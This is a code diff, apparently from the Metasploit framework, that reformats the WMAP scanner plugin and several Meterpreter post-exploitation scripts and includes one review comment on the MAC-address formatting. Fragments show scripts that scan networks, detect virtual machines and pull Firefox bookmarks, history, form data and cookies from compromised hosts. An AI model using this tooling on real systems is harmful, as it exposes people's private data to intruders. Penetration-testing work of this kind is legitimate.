- puts "Module #{xref[4]}"
+ print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -663,9 +663,9 @@ class Plugin::Wmap < Msf::Plugin
# Handle modules to be run at every path/file
# WMAP_DIR, WMAP_FILE
#
- puts "\n=[ File/Dir testing ]="
- puts "=" * sizeline
-
+ print_status "\n=[ File/Dir testing ]="
+ print_status "=" * sizeline
+
idx = 0
matches.each_key do |xref|
idx += 1
@@ -716,13 +716,13 @@ class Plugin::Wmap < Msf::Plugin
h = self.framework.db.workspace.hosts.find_by_address(selected_host)
s = h.services.find_by_port(selected_port)
w = s.web_sites.find_by_vhost(selected_vhost)
-
- puts "Module #{xref[4]}:"
-
+
+ print_status "Module #{xref[4]}:"
+
test_tree = load_tree(w)
test_tree.each do |node|
-
- p = node.current_path
+
+ p = node.current_path
testpath = Pathname.new(p)
strpath = testpath.cleanpath(false).to_s
@@ -830,9 +830,9 @@ class Plugin::Wmap < Msf::Plugin
# Run modules for each request to play with URI with UNIQUE query parameters.
# WMAP_UNIQUE_QUERY
#
- puts "\n=[ Unique Query testing ]="
- puts "=" * sizeline
-
+ print_status "\n=[ Unique Query testing ]="
+ print_status "=" * sizeline
+
idx = 0
matches5.each_key do |xref|
idx += 1
@@ -881,50 +881,50 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
utest_query = {}
-
+
h = self.framework.db.workspace.hosts.find_by_address(selected_host)
s = h.services.find_by_port(selected_port)
w = s.web_sites.find_by_vhost(selected_vhost)
-
+
w.web_forms.each do |form|
#
# Only test unique query strings by comparing signature to previous tested signatures 'path,p1,p2,pn'
#
-
+
datastr = ""
- typestr = ""
-
+ typestr = ""
+
temparr = []
-
- #puts "---------"
- #puts form.params
- #puts "+++++++++"
-
+
+ #print_status "---------"
+ #print_status form.params
+ #print_status "+++++++++"
+
form.params.each do |p|
pn, pv, pt = p
temparr << Rex::Text.uri_encode(pn.to_s) + "=" + Rex::Text.uri_encode(pv.to_s)
end
-
- datastr = temparr.join("&") if (temparr and not temparr.empty?)
-
+
+ datastr = temparr.join("&") if (temparr and not temparr.empty?)
+
if (utest_query.has_key?(mod.signature(form.path,datastr)) == false)
-
+
mod.datastore['METHOD'] = form.method.upcase
mod.datastore['PATH'] = form.path
mod.datastore['QUERY'] = form.query
if form.method.upcase == 'GET'
mod.datastore['QUERY'] = datastr
- mod.datastore['DATA'] = ""
- end
+ mod.datastore['DATA'] = ""
+ end
mod.datastore['DATA'] = datastr if form.method.upcase == 'POST'
mod.datastore['TYPES'] = typestr
-
+
#
# TODO: Add headers, etc.
#
if wtype == :WMAP_UNIQUE_QUERY
- puts "Module #{xref[4]}"
+ print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -953,7 +953,7 @@ class Plugin::Wmap < Msf::Plugin
# Unique query tested, actually the value does not matter
#
#print_status("sig: #{mod.signature(form.path,varnarr.join(','))}")
-
+
utest_query[mod.signature(form.path,datastr)]=1
else
#print_status("Already tested")
@@ -972,9 +972,9 @@ class Plugin::Wmap < Msf::Plugin
# and will make this shotgun implementation much simple.
# WMAP_QUERY
#
- puts "\n=[ Query testing ]="
- puts "=" * sizeline
-
+ print_status "\n=[ Query testing ]="
+ print_status "=" * sizeline
+
idx = 0
matches2.each_key do |xref|
idx += 1
@@ -1026,37 +1026,37 @@ class Plugin::Wmap < Msf::Plugin
h = self.framework.db.workspace.hosts.find_by_address(selected_host)
s = h.services.find_by_port(selected_port)
w = s.web_sites.find_by_vhost(selected_vhost)
-
+
w.web_forms.each do |req|
-
+
datastr = ""
- typestr = ""
-
+ typestr = ""
+
temparr = []
-
+
req.params.each do |p|
pn, pv, pt = p
temparr << Rex::Text.uri_encode(pn.to_s) + "=" + Rex::Text.uri_encode(pv.to_s)
end
-
- datastr = temparr.join("&") if (temparr and not temparr.empty?)
-
+
+ datastr = temparr.join("&") if (temparr and not temparr.empty?)
+
mod.datastore['METHOD'] = req.method.upcase
mod.datastore['PATH'] = req.path
if req.method.upcase == 'GET'
mod.datastore['QUERY'] = datastr
- mod.datastore['DATA'] = ""
- end
+ mod.datastore['DATA'] = ""
+ end
mod.datastore['DATA'] = datastr if req.method.upcase == 'POST'
mod.datastore['TYPES'] = typestr
-
-
+
+
#
# TODO: Add method, headers, etc.
#
if wtype == :WMAP_QUERY
- puts "Module #{xref[4]}"
+ print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -1087,16 +1087,16 @@ class Plugin::Wmap < Msf::Plugin
print_status(" >> Exception from #{xref[4]}: #{$!}")
end
end
-
+
#
# Handle modules that need to be after all tests, once.
# Good place to have modules that analize the test results and/or
# launch exploits.
# :WMAP_GENERIC
#
- puts "\n=[ General testing ]="
- puts "=" * sizeline
-
+ print_status "\n=[ General testing ]="
+ print_status "=" * sizeline
+
idx = 0
matches10.each_key do |xref|
idx += 1
@@ -1146,7 +1146,7 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
if wtype == :WMAP_GENERIC
- puts "Module #{xref[4]}"
+ print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -1159,7 +1159,7 @@ class Plugin::Wmap < Msf::Plugin
print_status(" >> Exception during check launch from #{xref[4]}: #{$!}")
end
else
-
+
begin
session = mod.run_simple(
'LocalInput' => driver.input,
@@ -1180,22 +1180,22 @@ class Plugin::Wmap < Msf::Plugin
if (mode & wmap_show != 0)
print_status("Analysis completed in #{(Time.now.to_f - stamp)} seconds.")
print_status("Done.")
- puts "+" * sizeline
- puts "\n"
+ print_status "+" * sizeline
+ print_status "\n"
end
end
# EOM
- end
-
+ end
+
def view_targets
if self.targets == nil or self.targets.keys.length == 0
print_status "No targets have been defined"
return
end
-
+
indent = ' '
-
+
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
'Header' => 'Defined targets',
@@ -1213,12 +1213,12 @@ class Plugin::Wmap < Msf::Plugin
tbl << [ idx.to_s, t[1][:vhost], t[1][:host], t[1][:port], t[1][:ssl], t[1][:path].to_s ]
}
- puts tbl.to_s + "\n"
+ print_status tbl.to_s + "\n"
end
-
+
def view_sites
indent = ' '
-
+
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
'Header' => 'Available sites',
@@ -1232,11 +1232,11 @@ class Plugin::Wmap < Msf::Plugin
'# Forms',
])
- idx = 0
+ idx = 0
self.framework.db.hosts.each do |bdhost|
bdhost.services.each do |serv|
serv.web_sites.each do |web|
- c = web.web_pages.count
+ c = web.web_pages.count
f = web.web_forms.count
tbl << [ idx.to_s, bdhost.address, web.vhost, serv.port, c.to_s, f.to_s ]
idx += 1
@@ -1244,23 +1244,23 @@ class Plugin::Wmap < Msf::Plugin
end
end
- puts tbl.to_s + "\n"
+ print_status tbl.to_s + "\n"
end
-
-
+
+
# Reusing code from hdmoore
#
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
-
+
def add_web_site(url)
-
-
-
+
+
+
vhost = nil
-
+
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
@@ -1281,24 +1281,24 @@ class Plugin::Wmap < Msf::Plugin
uri = URI.parse(url) rescue nil
if not uri
print_error("Could not understand URL: #{url}")
- return
+ return
end
if uri.scheme !~ /^https?/
print_error("Only http and https URLs are accepted: #{url}")
return
end
-
+
ssl = false
if uri.scheme == 'https'
ssl = true
end
-
+
site = self.framework.db.report_web_site(:wait => true, :host => uri.host, :port => uri.port, :vhost => vhost, :ssl => ssl)
return site
end
-
+
# Code by hdm. Modified two lines by et
#
def process_urls(urlstr)
@@ -1309,7 +1309,7 @@ class Plugin::Wmap < Msf::Plugin
urls.each do |url|
next if url.to_s.strip.empty?
vhost = nil
-
+
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
@@ -1345,10 +1345,10 @@ class Plugin::Wmap < Msf::Plugin
return if target_whitelist.length == 0
self.targets = {}
-
+
target_whitelist.each do |ent|
vhost,target = ent
-
+
host = self.framework.db.workspace.hosts.find_by_address(target.host)
if not host
print_error("No matching host for #{target.host}")
@@ -1359,16 +1359,16 @@ class Plugin::Wmap < Msf::Plugin
print_error("No matching service for #{target.host}:#{target.port}")
next
end
-
- #puts "aaa"
- #puts framework.db.workspace.name
-
+
+ #print_status "aaa"
+ #print_status framework.db.workspace.name
+
#sites = serv.web_sites.find(:all, :conditions => ['vhost = ? or vhost = ?', vhost, host.address])
-
+
sites = serv.web_sites.find(:all)
-
+
sites.each do |site|
-
+
#site.web_forms.find_all_by_path(target.path).each do |form|
ckey = [ site.vhost, host.address, serv.port, target.path].join("|")
if not self.targets[ckey]
@@ -1389,23 +1389,23 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
-
+
def view_site_tree(urlstr, md, ld)
-
+
site_whitelist = []
urls = urlstr.to_s.split(/\s+/)
urls.each do |url|
next if url.to_s.strip.empty?
vhost = nil
-
+
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
if url !~ /^http/
vhost,url = url.split(",", 2)
-
+
if url.to_s.empty?
url = vhost
vhost = nil
@@ -1435,10 +1435,10 @@ class Plugin::Wmap < Msf::Plugin
return if site_whitelist.length == 0
vsites = {}
-
+
site_whitelist.each do |ent|
vhost,target = ent
-
+
host = self.framework.db.workspace.hosts.find_by_address(target.host)
if not host
print_error("No matching host for #{target.host}")
@@ -1449,14 +1449,14 @@ class Plugin::Wmap < Msf::Plugin
print_error("No matching service for #{target.host}:#{target.port}")
next
end
-
- #puts "aaa"
- #puts framework.db.workspace.name
-
+
+ #print_status "aaa"
+ #print_status framework.db.workspace.name
+
sites = serv.web_sites.find(:all, :conditions => ['vhost = ? or vhost = ?', vhost, host.address])
-
+
#sites = serv.web_sites.find(:all)
-
+
sites.each do |site|
#site.vhost
#site.web_forms.find_all_by_path(target.path).each do |form|
@@ -1466,18 +1466,18 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
-
+
#
# Load website structure into a tree
#
def load_tree(s)
-
+
pathchr = '/'
-
+
wtree = Tree.new(s.vhost)
- # Load site pages
+ # Load site pages
s.web_pages.find(:all, :order => 'path').each do |req|
tarray = req.path.to_s.split(pathchr)
tarray.delete("")
@@ -1487,7 +1487,7 @@ class Plugin::Wmap < Msf::Plugin
tpath = tpath + Pathname.new(df.to_s)
end
end
-
+
# Load site forms
s.web_forms.each do |req|
tarray = req.path.to_s.split(pathchr)
@@ -1498,42 +1498,42 @@ class Plugin::Wmap < Msf::Plugin
tpath = tpath + Pathname.new(df.to_s)
end
end
-
+
return wtree
end
#
# Print Tree structure. Still ugly
#
-
+
def print_tree(tree, maxlevel, limitlevel)
initab = " " * 4
indent = 6
if tree != nil and tree.depth <= maxlevel
print initab + (" " * indent * tree.depth)
if tree.depth > 0
- print "|"+("-" * (indent-1))+"/"
+ print "|"+("-" * (indent-1))+"/"
end
- if tree.depth >= 0
+ if tree.depth >= 0
if tree.depth == 0
- print "[#{tree.name}]\n"+initab+(" " * indent)+"|\n"
-
+ print "[#{tree.name}]\n"+initab+(" " * indent)+"|\n"
+
else
c = tree.children.count
if c > 0
print tree.name + " (" + c.to_s+")\n"
else
print tree.name + "\n"
- end
+ end
end
end
-
+
tree.children.each_pair do |name,child|
print_tree(child,maxlevel,limitlevel)
end
end
end
-
+
#def print_tree(tree)
# if tree.is_leaf? and tree.depth > 0
@@ -1545,7 +1545,7 @@ class Plugin::Wmap < Msf::Plugin
# print_tree(child)
# end
#end
-
+
end
class WebTarget < ::Hash
@@ -1554,10 +1554,10 @@ class Plugin::Wmap < Msf::Plugin
"#{proto}://#{self[:host]}:#{self[:port]}#{self[:path]}"
end
end
-
+
def initialize(framework, opts)
super
-
+
wmapversion = '1.0'
wmapbanner = "[WMAP #{wmapversion}] === et [ ] metasploit.com 2011"
diff --git a/plugins/xmlrpc.rb b/plugins/xmlrpc.rb
index 999a0afa0e..52518cb899 100644
--- a/plugins/xmlrpc.rb
+++ b/plugins/xmlrpc.rb
@@ -138,7 +138,7 @@ class Plugin::XMLRPC < Msf::Plugin
self.server.add_handler(::XMLRPC::iPIMethods("plugin"),
::Msf::RPC::Plugin.new(*args)
)
-
+
# Set the default/catch-all handler
self.server.set_default_handler do |name, *args|
raise ::XMLRPC::FaultException.new(-99, "Method #{name} missing or wrong number of parameters!")
diff --git a/scripts/meterpreter/arp_scanner.rb b/scripts/meterpreter/arp_scanner.rb
index fbcda589e0..cab09e016e 100644
--- a/scripts/meterpreter/arp_scanner.rb
+++ b/scripts/meterpreter/arp_scanner.rb
@@ -25,6 +25,7 @@ def enum_int
end
end
+
def arp_scan(cidr)
print_status("ARP Scanning #{cidr}")
ws = client.railgun.ws2_32
@@ -42,27 +43,20 @@ def arp_scan(cidr)
end
iplst.each do |ip_text|
if i < 10
- a.push(::Thread.new {
+ a.push(::Thread.new {
h = ws.inet_addr(ip_text)
ip = h["return"]
h = iphlp.SendARP(ip,0,6,6)
if h["return"] == client.railgun.const("NO_ERROR")
- mac = h["pMacAddr"]
- print_status("IP: #{ip_text} MAC " +
- mac[0].ord.to_s(16) + ":" +
- mac[1].ord.to_s(16) + ":" +
- mac[2].ord.to_s(16) + ":" +
- mac[3].ord.to_s(16) + ":" +
- mac[4].ord.to_s(16) + ":" +
- mac[5].ord.to_s(16)
- )
+ mac_text = h["pMacAddr"].unpack('C*').map { |e| "%02x" % e }.join(':')
+ print_status("IP: #{ip_text} MAC #{mac_text}")
found << "#{ip_text}\n"
end
})
- i += 1
+ i += 1
else
- sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
- i = 0
+ sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
+ i = 0
end
end
a.delete_if {|x| not x.alive?} while not a.empty?
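Review bot: The new `h["pMacAddr"].unpack('C*')` formats every byte of the returned buffer, whereas the removed code printed exactly six; if railgun hands back a buffer larger than the 6 bytes requested in `SendARP(ip,0,6,6)`, the MAC shown would carry extra octets, so `unpack('C6')` keeps the old bound while retaining the zero-padded `%02x` output. `arp_scan` starts in the previous hunk and its body continues after this one.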
@@ -118,4 +112,4 @@ if client.platform =~ /win32|win64/
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
-end
\ No newline at end of file
+end
diff --git a/scripts/meterpreter/autoroute.rb b/scripts/meterpreter/autoroute.rb
index 55aaaecaad..8fa695edd7 100644
--- a/scripts/meterpreter/autoroute.rb
+++ b/scripts/meterpreter/autoroute.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Meterpreter script for setting up a route from within a
diff --git a/scripts/meterpreter/checkvm.rb b/scripts/meterpreter/checkvm.rb
index 1c2373636c..8f5b68c8cb 100644
--- a/scripts/meterpreter/checkvm.rb
+++ b/scripts/meterpreter/checkvm.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
# Meterpreter script for detecting if target host is a Virtual Machine
# Provided by Carlos Perez at carlos_perez[at]darkoperator.com
# Version: 0.2.0
@@ -20,37 +21,38 @@ session = client
# Function for detecting if it is a Hyper-V VM
def hypervchk(session)
- begin
- vm = false
- key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft', KEY_READ)
- sfmsvals = key.enum_key
- if sfmsvals.include?("Hyper-V")
- print_status("This is a Hyper-V Virtual Machine")
- vm = true
- elsif sfmsvals.include?("VirtualMachine")
- print_status("This is a Hyper-V Virtual Machine")
- vm = true
- end
- key.close
- rescue
- end
- if not vm
- begin
- key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
- srvvals = key.enum_key
- if srvvals.include?("vmicheartbeat")
+ begin
+ vm = false
+ key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft', KEY_READ)
+ sfmsvals = key.enum_key
+ if sfmsvals.include?("Hyper-V")
print_status("This is a Hyper-V Virtual Machine")
vm = true
- elsif srvvals.include?("vmicvss")
- print_status("This is a Hyper-V Virtual Machine")
- vm = true
- elsif srvvals.include?("vmicshutdown")
- print_status("This is a Hyper-V Virtual Machine")
- vm = true
- elsif srvvals.include?("vmicexchange")
+ elsif sfmsvals.include?("VirtualMachine")
print_status("This is a Hyper-V Virtual Machine")
vm = true
end
+ key.close
+ rescue
+ end
+
+ if not vm
+ begin
+ key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
+ srvvals = key.enum_key
+ if srvvals.include?("vmicheartbeat")
+ print_status("This is a Hyper-V Virtual Machine")
+ vm = true
+ elsif srvvals.include?("vmicvss")
+ print_status("This is a Hyper-V Virtual Machine")
+ vm = true
+ elsif srvvals.include?("vmicshutdown")
+ print_status("This is a Hyper-V Virtual Machine")
+ vm = true
+ elsif srvvals.include?("vmicexchange")
+ print_status("This is a Hyper-V Virtual Machine")
+ vm = true
+ end
rescue
end
end
@@ -81,11 +83,11 @@ def vmwarechk(session)
end
if not vm
begin
- key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
- if key.query_value('Identifier').data.downcase =~ /vmware/
- print_status("This is a VMware Virtual Machine")
- vm = true
- end
+ key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
+ if key.query_value('Identifier').data.downcase =~ /vmware/
+ print_status("This is a VMware Virtual Machine")
+ vm = true
+ end
rescue
end
end
diff --git a/scripts/meterpreter/credcollect.rb b/scripts/meterpreter/credcollect.rb
index 5752aafb12..5cf971a954 100644
--- a/scripts/meterpreter/credcollect.rb
+++ b/scripts/meterpreter/credcollect.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
# credcollect - tebo[at]attackresearch.com
opts = Rex::Parser::Arguments.new(
diff --git a/scripts/meterpreter/domain_list_gen.rb b/scripts/meterpreter/domain_list_gen.rb
index 8eed32031d..4ca6eaf5be 100644
--- a/scripts/meterpreter/domain_list_gen.rb
+++ b/scripts/meterpreter/domain_list_gen.rb
@@ -32,20 +32,20 @@ host = @client.sys.config.sysinfo['Computer']
current_user = @client.sys.config.getuid.scan(/\S*\\(.*)/)
def reg_getvaldata(key,valname)
- value = nil
- begin
- root_key, base_key = @client.sys.registry.splitkey(key)
- open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ)
- v = open_key.query_value(valname)
- value = v.data
- open_key.close
- end
- return value
+ value = nil
+ begin
+ root_key, base_key = @client.sys.registry.splitkey(key)
+ open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ)
+ v = open_key.query_value(valname)
+ value = v.data
+ open_key.close
+ end
+ return value
end
domain = reg_getvaldata("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon","DefaultDomainName")
-if domain == ""
- print_error("domain not found")
+if domain == ""
+ print_error("domain not found")
end
# Create Filename info to be appended to downloaded files
diff --git a/scripts/meterpreter/duplicate.rb b/scripts/meterpreter/duplicate.rb
index 0895dd44b3..fb99634e8d 100644
--- a/scripts/meterpreter/duplicate.rb
+++ b/scripts/meterpreter/duplicate.rb
@@ -1,9 +1,9 @@
# $Id$
# $Revision$
# Author: Scriptjunkie
-# Uses a meterpreter session to spawn a new meterpreter session in a different process.
+# Uses a meterpreter session to spawn a new meterpreter session in a different process.
# A new process allows the session to take "risky" actions that might get the process killed by
-# A/V, giving a meterpreter session to another controller, or start a keylogger on another
+# A/V, giving a meterpreter session to another controller, or start a keylogger on another
# process.
#
@@ -83,7 +83,7 @@ if client.platform =~ /win32|win64/
server = client.sys.process.open
print_status("Current server process: #{server.name} (#{server.pid})")
-
+
if ! inject
exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
print_status("Meterpreter stager executable #{exe.length} bytes long")
diff --git a/scripts/meterpreter/enum_chrome.rb b/scripts/meterpreter/enum_chrome.rb
index f988d074f9..7891bc6225 100644
--- a/scripts/meterpreter/enum_chrome.rb
+++ b/scripts/meterpreter/enum_chrome.rb
@@ -33,7 +33,7 @@ end
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu" ],
- "-m" => [ false, "Migrate into explorer.exe"],
+ "-m" => [ false, "Migrate into explorer.exe"],
"-f" => [ true, "Output format: j[son], y[aml], t[ext]. Defaults to json"]
)
@@ -43,7 +43,7 @@ opts.parse(args) { |opt, idx, val|
@migrate = true
when "-f"
if val =~ /^j(son)?$/
- @output_format << "json"
+ @output_format << "json"
elsif val =~ /^y(aml)?$/
@output_format << "yaml"
elsif val =~ /^t(ext)?$/
@@ -71,10 +71,10 @@ if @output_format.include?("json")
require 'json'
rescue LoadError
print_error("JSON is not available.")
- @output_format.delete("json")
+ @output_format.delete("json")
if @output_format.empty?
print_status("Falling back to raw text output.")
- @output_format << "text"
+ @output_format << "text"
end
end
end
@@ -123,7 +123,7 @@ def write_output(file, rows)
::File.open(file + ".yml", "w") { |f| f.write(JSON.pretty_generate(rows)) }
end
if @output_format.include?("text")
- ::File.open(file + ".txt", "w") do |f|
+ ::File.open(file + ".txt", "w") do |f|
f.write(rows.first.keys.join("\t") + "\n")
f.write(rows.map { |e| e.values.map(&:inspect).join("\t") }.join("\n"))
end
diff --git a/scripts/meterpreter/enum_firefox.rb b/scripts/meterpreter/enum_firefox.rb
index 2900b1166c..0cc651fc97 100644
--- a/scripts/meterpreter/enum_firefox.rb
+++ b/scripts/meterpreter/enum_firefox.rb
@@ -1,6 +1,6 @@
#
# $Id: enum_firefox.rb 9770 2010-07-10 20:00:32Z darkoperator $
-# $Revision$
+# $Revision: $
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
@@ -52,24 +52,24 @@ def frfxdmp(usrnm)
cookies = []
formvals = ''
searches = ''
- results = ''
- placesdb = @logs + ::File::Separator + usrnm + "places.sqlite"
- formdb = @logs + ::File::Separator + usrnm + "formhistory.sqlite"
- searchdb = @logs + ::File::Separator + usrnm + "search.sqlite"
- cookiesdb = @logs + ::File::Separator + usrnm + "cookies.sqlite"
+ results = ''
+ placesdb = @logs + ::File::Separator + usrnm + "places.sqlite"
+ formdb = @logs + ::File::Separator + usrnm + "formhistory.sqlite"
+ searchdb = @logs + ::File::Separator + usrnm + "search.sqlite"
+ cookiesdb = @logs + ::File::Separator + usrnm + "cookies.sqlite"
bookmarks = @logs + ::File::Separator + usrnm + "_bookmarks.txt"
download_list = @logs + ::File::Separator + usrnm + "_download_list.txt"
url_history = @logs + ::File::Separator + usrnm + "_history.txt"
form_history = @logs + ::File::Separator + usrnm + "_form_history.txt"
search_history = @logs + ::File::Separator + usrnm + "_search_history.txt"
- begin
+ begin
print_status("\tGetting Firefox Bookmarks for #{usrnm}")
db = SQLite3::Database.new(placesdb)
#print_status("\tProcessing #{placesdb}")
db.execute('select a.url from moz_places a, moz_bookmarks b, '+
- 'moz_bookmarks_roots c where a.id=b.fk and parent=2'+
- ' and folder_id=2 and a.hidden=0')do |row|
+ 'moz_bookmarks_roots c where a.id=b.fk and parent=2'+
+ ' and folder_id=2 and a.hidden=0') do |row|
bkmrks << row
end
print_status("\tSaving to #{bookmarks}")
@@ -77,8 +77,8 @@ def frfxdmp(usrnm)
bkmrks.each do |b|
file_local_write(bookmarks,"\t#{b.to_s}\n")
end
- else
- print_status("\tIt appears that there are no bookmarks for this account")
+ else
+ print_status("\tIt appears that there are no bookmarks for this account")
end
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
@@ -87,17 +87,17 @@ def frfxdmp(usrnm)
begin
print_status("\tGetting list of Downloads using Firefox made by #{usrnm}")
db.execute('SELECT url FROM moz_places, moz_historyvisits ' +
- 'WHERE moz_places.id = moz_historyvisits.place_id '+
- 'AND visit_type = "7" ORDER by visit_date') do |row|
+ 'WHERE moz_places.id = moz_historyvisits.place_id '+
+ 'AND visit_type = "7" ORDER by visit_date') do |row|
dnldsmade << row
end
- print_status("\tSaving Download list to #{download_list}")
+ print_status("\tSaving Download list to #{download_list}")
if dnldsmade.length != 0
dnldsmade.each do |d|
file_local_write(download_list,"\t#{d.to_s} \n")
end
- else
- print_status("\tIt appears that downloads where cleared for this account")
+ else
+ print_status("\tIt appears that downloads where cleared for this account")
end
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
@@ -106,8 +106,8 @@ def frfxdmp(usrnm)
begin
print_status("\tGetting Firefox URL History for #{usrnm}")
db.execute('SELECT DISTINCT url FROM moz_places, moz_historyvisits ' +
- 'WHERE moz_places.id = moz_historyvisits.place_id ' +
- 'AND visit_type = "1" ORDER by visit_date' ) do |row|
+ 'WHERE moz_places.id = moz_historyvisits.place_id ' +
+ 'AND visit_type = "1" ORDER by visit_date' ) do |row|
sitesvisited << row
end
print_status("\tSaving URL History to #{url_history}")
@@ -115,8 +115,8 @@ def frfxdmp(usrnm)
sitesvisited.each do |s|
file_local_write(url_history,"\t#{s.to_s}\n")
end
- else
- print_status("\tIt appears that Browser History has been cleared")
+ else
+ print_status("\tIt appears that Browser History has been cleared")
end
db.close
rescue::Exception => e
@@ -130,11 +130,11 @@ def frfxdmp(usrnm)
db.execute("SELECT fieldname,value FROM moz_formhistory") do |row|
formvals << "\tField: #{row[0]} Value: #{row[1]}\n"
end
- print_status("\tSaving Firefox Form History to #{form_history}")
+ print_status("\tSaving Firefox Form History to #{form_history}")
if formvals.length != 0
file_local_write(form_history,formvals)
- else
- print_status("\tIt appears that Form History has been cleared")
+ else
+ print_status("\tIt appears that Form History has been cleared")
end
db.close
rescue::Exception => e
@@ -148,11 +148,11 @@ def frfxdmp(usrnm)
db.execute("SELECT name,value FROM engine_data") do |row|
searches << "\tField: #{row[0]} Value: #{row[1]}\n"
end
- print_status("\tSaving Firefox Search History to #{search_history}")
+ print_status("\tSaving Firefox Search History to #{search_history}")
if searches.length != 0
file_local_write(search_history,searches)
- else
- print_status("\tIt appears that Search History has been cleared")
+ else
+ print_status("\tIt appears that Search History has been cleared")
end
db.close
rescue::Exception => e
@@ -176,7 +176,7 @@ def frfxdmp(usrnm)
fd.puts "isHttpOnly: " + item[8].to_s + "\n"
fd.close
end
- return results
+ return results
end
#-------------------------------------------------------------------------------
#Function for getting password files
diff --git a/scripts/meterpreter/enum_powershell_env.rb b/scripts/meterpreter/enum_powershell_env.rb
index 0e516325ae..5ff53f199c 100644
--- a/scripts/meterpreter/enum_powershell_env.rb
+++ b/scripts/meterpreter/enum_powershell_env.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision: $
#Meterpreter script for enumerating Microsoft Powershell settings.
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
@client = client
diff --git a/scripts/meterpreter/enum_putty.rb b/scripts/meterpreter/enum_putty.rb
index d0c89614bc..76e7994e63 100644
--- a/scripts/meterpreter/enum_putty.rb
+++ b/scripts/meterpreter/enum_putty.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision: $
#
# Meterpreter script for enumerating putty connections
# Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
diff --git a/scripts/meterpreter/enum_vmware.rb b/scripts/meterpreter/enum_vmware.rb
index ceeeae8bcb..9fef542251 100644
--- a/scripts/meterpreter/enum_vmware.rb
+++ b/scripts/meterpreter/enum_vmware.rb
@@ -1,5 +1,6 @@
-# $Id$
+# $Id: $
# $Revision$
+
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
@@ -261,7 +262,7 @@ def enum_vihosupdt
begin
@client.fs.dir.foreach(u['userappdata']+"VIU\\hosts\\") do |vmdir|
next if vmdir =~ /^(\.|\.\.)$/
- print_status("\t#{vmdir}")
+ print_status("\t#{vmdir}")
end
rescue
end
diff --git a/scripts/meterpreter/event_manager.rb b/scripts/meterpreter/event_manager.rb
index ecaf97b22a..87480062ea 100644
--- a/scripts/meterpreter/event_manager.rb
+++ b/scripts/meterpreter/event_manager.rb
@@ -89,8 +89,7 @@ def print_log_details
tbl = Rex::Ui::Text::Table.new(
'Header' => "Event Logs on System",
'Indent' => 1,
- 'Columns' =>
- [
+ 'Columns' => [
"Name",
"Retention",
"Maximum Size",
diff --git a/scripts/meterpreter/get_application_list.rb b/scripts/meterpreter/get_application_list.rb
index 6b9cdad99a..bb0cd8fdfa 100644
--- a/scripts/meterpreter/get_application_list.rb
+++ b/scripts/meterpreter/get_application_list.rb
@@ -1,18 +1,18 @@
# $Id$
+# $Revision: $
# Meterpreter script for listing installed applications and their version.
# Provided: carlos_perez[at]darkoperator[dot]com
#Options and Option Parsing
opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu." ]
+ "-h" => [ false, "Help menu." ]
)
def app_list
tbl = Rex::Ui::Text::Table.new(
'Header' => "Installed Applications",
'Indent' => 1,
- 'Columns' =>
- [
+ 'Columns' => [
"Name",
"Version"
])
@@ -49,13 +49,13 @@ def app_list
end
opts.parse(args) { |opt, idx, val|
- case opt
- when "-h"
- print_line "Meterpreter Script for extracting a list installed applications and their version."
- print_line(opts.usage)
- raise Rex::Script::Completed
-
- end
+ case opt
+ when "-h"
+ print_line "Meterpreter Script for extracting a list installed applications and their version."
+ print_line(opts.usage)
+ raise Rex::Script::Completed
+
+ end
}
if client.platform =~ /win32|win64/
app_list
